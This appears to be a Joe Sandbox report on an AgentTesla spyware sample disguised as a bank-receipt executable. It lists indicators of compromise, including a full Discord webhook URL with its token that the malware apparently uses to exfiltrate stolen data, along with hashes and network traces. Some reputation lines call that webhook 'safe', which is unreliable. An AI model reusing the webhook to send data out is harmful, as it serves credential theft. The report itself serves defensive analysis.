        SourceDetectionScannerLabelLink
        https://discord.com0%URL Reputationsafe
        http://discord.com0%URL Reputationsafe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr0%Avira URL Cloudsafe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F310%Avira URL Cloudsafe
        https://discord.com4Dp0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        discord.com
        		162.159.128.233
        		truetrue
          		unknown
          api4.ipify.org
          		64.185.227.155
          		truefalse
            		high
            api.ipify.org
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                		high
                https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osrtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.ipify.orgCasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://discord.comCasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://discord.comCasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://discord.com4DpCasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    162.159.128.233
                    		discord.comUnited States
                    		13335CLOUDFLARENETUStrue
                    64.185.227.155
                    		api4.ipify.orgUnited States
                    		18450WEBNXUSfalse

                    General Information

                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:800710
                    Start date and time:2023-02-07 18:30:27 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 26s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:e-dekont-20230207.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 17.7% (good quality ratio 15.8%)
                    • Quality average: 62.8%
                    • Quality standard deviation: 34.3%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: e-dekont-20230207.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    18:31:29API Interceptor951x Sleep call for process: CasPol.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230207.exe.log

                    Download File
                    Process:C:\Users\user\Desktop\e-dekont-20230207.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):226
                    Entropy (8bit):5.354940450065058
                    Encrypted:false
                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                    MD5:B10E37251C5B495643F331DB2EEC3394
                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

                    Static File Info

                    General

                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.965063063447085
                    TrID:
                    • Win64 Executable GUI Net Framework (217006/5) 47.53%
                    • Win64 Executable GUI (202006/5) 44.25%
                    • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                    • Win64 Executable (generic) (12005/4) 2.63%
                    • Generic Win/DOS Executable (2004/3) 0.44%
                    File name:e-dekont-20230207.exe
                    File size:688128
                    MD5:2fbaa4d917cce04617f24f87309286d6
                    SHA1:7480ce7aebd7f59da7d6bd4f9eb7bba0efe05f97
                    SHA256:91eb17a8906ebbe9c50ef6a509e80133fd3322aec9b84e04cc5925992235c17e
                    SHA512:a2776ed384951898f491546f1050a26f744701c86478865e277288d5b639723f3d96a0cb8ca3e77941155d4fafc67970f4c2b713d0e16894ca58e3f3be718825
                    SSDEEP:12288:OEc+106G5pJptT7f98u1548XTTtSXIK4798qdGxd3rb5Oi4W21q1ni/:O1+1pG5znHz151ntSM9zEd3rb58H1Wg
                    TLSH:76E42212724F57BBE6296071C8FB087B13B57305A533D8A9BF1C12886F84B5B6E99F40
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....!..................r............... ....@...... ....................................@................................

                    File Icon

                    Icon Hash:00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x400000
                    Entrypoint Section:
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x9521C718 [Wed Apr 14 13:14:00 2049 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:

                    Entrypoint Preview

                    Instruction
                    dec ebp
                    pop edx
                    nop
                    add byte ptr [ebx], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x598.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0xa91580x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000xa71f40xa7200False0.9709777603777113data7.972775066304571IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .sdata0xaa0000x1e80x200False0.861328125data6.632870559527538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xac0000x5980x600False0.4147135416666667data4.06869988795393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_VERSION0xac0a00x30cdata
                    RT_MANIFEST0xac3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.5162.159.128.233496904432851779 02/07/23-18:31:33.991128TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49690443192.168.2.5162.159.128.233

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Feb 7, 2023 18:31:28.993040085 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:28.993093014 CET4434968964.185.227.155192.168.2.5
                    Feb 7, 2023 18:31:28.993184090 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:29.022833109 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:29.022871017 CET4434968964.185.227.155192.168.2.5
                    Feb 7, 2023 18:31:29.340893984 CET4434968964.185.227.155192.168.2.5
                    Feb 7, 2023 18:31:29.341072083 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:29.385968924 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:29.385994911 CET4434968964.185.227.155192.168.2.5
                    Feb 7, 2023 18:31:29.386605024 CET4434968964.185.227.155192.168.2.5
                    Feb 7, 2023 18:31:29.430265903 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:29.658529997 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:29.658596039 CET4434968964.185.227.155192.168.2.5
                    Feb 7, 2023 18:31:29.765906096 CET4434968964.185.227.155192.168.2.5
                    Feb 7, 2023 18:31:29.766043901 CET4434968964.185.227.155192.168.2.5
                    Feb 7, 2023 18:31:29.768034935 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:29.768892050 CET49689443192.168.2.564.185.227.155
                    Feb 7, 2023 18:31:33.870203972 CET49690443192.168.2.5162.159.128.233
                    Feb 7, 2023 18:31:33.870248079 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:33.870311975 CET49690443192.168.2.5162.159.128.233
                    Feb 7, 2023 18:31:33.871211052 CET49690443192.168.2.5162.159.128.233
                    Feb 7, 2023 18:31:33.871223927 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:33.926682949 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:33.926832914 CET49690443192.168.2.5162.159.128.233
                    Feb 7, 2023 18:31:33.929459095 CET49690443192.168.2.5162.159.128.233
                    Feb 7, 2023 18:31:33.929469109 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:33.929898977 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:33.933212042 CET49690443192.168.2.5162.159.128.233
                    Feb 7, 2023 18:31:33.933223009 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:33.990571022 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:33.991055965 CET49690443192.168.2.5162.159.128.233
                    Feb 7, 2023 18:31:33.991079092 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:34.130938053 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:34.131040096 CET44349690162.159.128.233192.168.2.5
                    Feb 7, 2023 18:31:34.131088018 CET49690443192.168.2.5162.159.128.233
                    Feb 7, 2023 18:31:34.136661053 CET49690443192.168.2.5162.159.128.233

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Feb 7, 2023 18:31:28.926114082 CET5494953192.168.2.58.8.8.8
                    Feb 7, 2023 18:31:28.946228027 CET53549498.8.8.8192.168.2.5
                    Feb 7, 2023 18:31:28.960350037 CET5821853192.168.2.58.8.8.8
                    Feb 7, 2023 18:31:28.980236053 CET53582188.8.8.8192.168.2.5
                    Feb 7, 2023 18:31:33.830131054 CET6099853192.168.2.58.8.8.8
                    Feb 7, 2023 18:31:33.850213051 CET53609988.8.8.8192.168.2.5

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Feb 7, 2023 18:31:28.926114082 CET192.168.2.58.8.8.80x4145Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:28.960350037 CET192.168.2.58.8.8.80x96d5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:33.830131054 CET192.168.2.58.8.8.80x3a38Standard query (0)discord.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Feb 7, 2023 18:31:28.946228027 CET8.8.8.8192.168.2.50x4145No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                    Feb 7, 2023 18:31:28.946228027 CET8.8.8.8192.168.2.50x4145No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:28.946228027 CET8.8.8.8192.168.2.50x4145No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:28.946228027 CET8.8.8.8192.168.2.50x4145No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:28.980236053 CET8.8.8.8192.168.2.50x96d5No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                    Feb 7, 2023 18:31:28.980236053 CET8.8.8.8192.168.2.50x96d5No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:28.980236053 CET8.8.8.8192.168.2.50x96d5No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:28.980236053 CET8.8.8.8192.168.2.50x96d5No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • api.ipify.org
                    • discord.com

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:18:31:24
                    Start date:07/02/2023
                    Path:C:\Users\user\Desktop\e-dekont-20230207.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Desktop\e-dekont-20230207.exe
                    Imagebase:0xfc0000
                    File size:688128 bytes
                    MD5 hash:2FBAA4D917CCE04617F24F87309286D6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:low

                    General

                    Target ID:1
                    Start time:18:31:26
                    Start date:07/02/2023
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                    Imagebase:0x5e0000
                    File size:107624 bytes
                    MD5 hash:F866FC1C2E928779C7119353C3091F0C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:moderate

                    Disassembly

                    No disassembly